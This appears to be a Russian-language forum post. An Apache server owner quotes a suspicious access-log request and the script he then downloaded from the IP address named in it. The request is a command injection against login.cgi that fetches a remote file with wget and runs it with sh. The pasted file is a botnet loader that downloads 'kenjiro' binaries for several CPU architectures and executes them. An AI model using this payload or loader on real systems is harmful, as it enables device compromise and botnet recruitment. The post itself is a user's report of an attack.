Стоит apache веб сервер. Решил посмотреть с интереса логи в а именно /var/log/apache2/access.log
Там какой-то запрос непонятный:
"GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.171/bin%20-0%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
Я решил по приколу взять тот ИП что в запросе и в браузере вбить
http://176.32.33.171/bin
Скачался файл с содержимым:
n="kenjiro.arm kenjiro.arm7 kenjiro.mips kenjiro.mpsl"
http_server="176.32.33.171"
dirs="/tmp/ /dev/ /dev/shm/ /var/ /var/run/ /var/tmp/"
for dir in $dirs
do
>$dir.file && cd $dir
done
for i in $n
do
cp $SHELL $i
>$i
chmod 777 $i
wget http://$http_server/$i -O- >$i || curl -O http://$http_server/$
chmod 777 $i
./$i
done
Причем перед тем уже было что-то такое, там содержимое если не индентично то ну очень похоже уже не вспомню. А название файла было другое.
Простой
